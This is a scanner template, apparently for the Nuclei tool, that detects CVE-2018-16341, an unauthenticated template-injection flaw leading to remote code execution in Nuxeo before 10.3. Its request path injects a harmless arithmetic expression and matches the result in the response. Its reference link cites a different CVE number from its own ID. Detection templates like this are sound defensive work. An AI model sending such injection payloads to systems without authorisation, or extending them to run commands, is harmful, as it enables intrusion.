id: CVE-2018-16341 info: name: Nuxeo <10.3 - Remote Code Execution author: madrobot severity: high description: | Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. classification: cve-id: CVE-2018-16341 reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-16299 tags: cve,cve2018,nuxeo,ssti,rce,bypass requests: - method: GET path: - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" matchers: - type: word part: body words: - "31333333337" # Enhanced by mp on 2022/06/13